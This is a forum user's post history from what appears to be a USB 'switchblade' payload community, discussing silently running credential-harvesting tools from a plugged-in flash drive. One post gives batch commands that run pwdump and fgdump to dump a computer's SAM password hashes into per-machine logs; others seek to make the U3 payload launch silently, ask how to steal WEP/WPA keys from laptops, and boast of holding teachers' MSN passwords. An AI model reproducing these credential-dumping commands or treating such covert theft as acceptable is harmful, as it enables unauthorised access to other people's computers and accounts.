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Posts posted by marc

  1. darkjoker, I received that error a few times, but mainly in a media centre PC. What OS gives you that? A google search seems to show results for all kinds of USB devices, and therefore I do not think its the payload that gives that problem.

    Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table?

  2. hey guys,

    Here is my payload as it stands (not all of it, just certain files):


    I also have a BAT file which renames the go.cmd to go1.cmd, in order to deactivate/activate the payload.

    I am wondering of a way that I could do a similar thing but with the U3 Launchpad, so that it can either be 100% silent when plugging in, or display the launchpad.

    Hope you guys can help,


  3. Yes, I do have the files, in the WIPCMD folder, along with pwdump. Still getting the error. I will show you how I am calling it:

    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
    echo ***********[Dump SAM]*************** >> ....Documentslogfiles%computername%.log 2>&1
    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
       ..WIPCMDpwdump >> ....Documentslogfiles%computername%.log 2>&1
    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
    echo ***********[Dump SAM1]*************** >> ....Documentslogfiles%computername%.log 2>&1
    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
       ..WIPCMDfgdump >> ....Documentslogfiles%computername%.log 2>&1

  4. I cant seem to get my SAM dump working with PWdump or even FGdump.

    Here is the error I seem to get:

    ***********[Dump SAM]*************** 
    Service start failed: 2
    pwdump6 Version 1.4.3 by fizzgig and the mighty group at foofus.net
    Copyright 2006 foofus.net
    This program is free software under the GNU
    General Public License Version 2 (GNU GPL), you can redistribute it and/or
    modify it under the terms of the GNU GPL, as published by the Free Software
    PROGRAM.  Please see the COPYING file included with this program
    and the GNU GPL for further details.
    ***********[Dump SAM1]*************** 
    fgDump 1.5.0 - fizzgig and the mighty group at foofus.net
    Written to make j0m0kun's life just a bit easier
    Copyright(C) 2007 fizzgig and foofus.net
    fgdump comes with ABSOLUTELY NO WARRANTY!
    This is free software, and you are welcome to redistribute it
    under certain conditions; see the COPYING and README files for
    more information.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    Starting dump on
    ERROR GetOSVersion: 53 - The network path was not found.
    ** Beginning local dump **
    Unable to determine OS version, see previous error for details
    Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system.
    CRITICAL: Error retrieving remote service information. Remote registry may not be running, simple file sharing may be enabled, or the account may not have 'Log On as Batch Job' permission. Skipping this host.
    Error dumping server, see previous messages for details
    Failed servers:
    Successful servers:
    Total failed: 1
    Total successful:

  5. Im in school and could be classified as a jumpy fuck when im doing something i shouldnt be. Loosing my switchblade and asking my teacher for it couldnt have helped. Got it back without any trouble thats a different story though...

    Wuss :P.

    Lol, kidding. I do have about 4 teachers msn passwords and that though.

  6. Heh, going pretty good eh MaxDamage

    edit: i think theres been so much work, im now spoilt for choice when going to extract a bunch of files to my USB drive. One super version combining the lot would be great. Perhaps a setup install, allowing people to choose what type of drive they want/what they want the drive to do.

    I guess its easy for me to say this rather than get down and write myself.

    Keep it up guys.

  7. Yep Poyboy, i get that too on this machine, along with a Mozy Remote window opening up.

    How about WEP Keys, or any wireless details? I'm using Amish's version on laptops and it would be great to steal WEP/WPA details for use with my own laptop or nintendo DS linux.

  8. Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition?

    I know some people just use common sense instead of any real AV, but very little can be trusted.

  9. Sorry for double post, but I just have something involving morals to say.

    I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want.

    AV's should realise that we do want to learn about this stuff. It is very useful to know.

    Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about.

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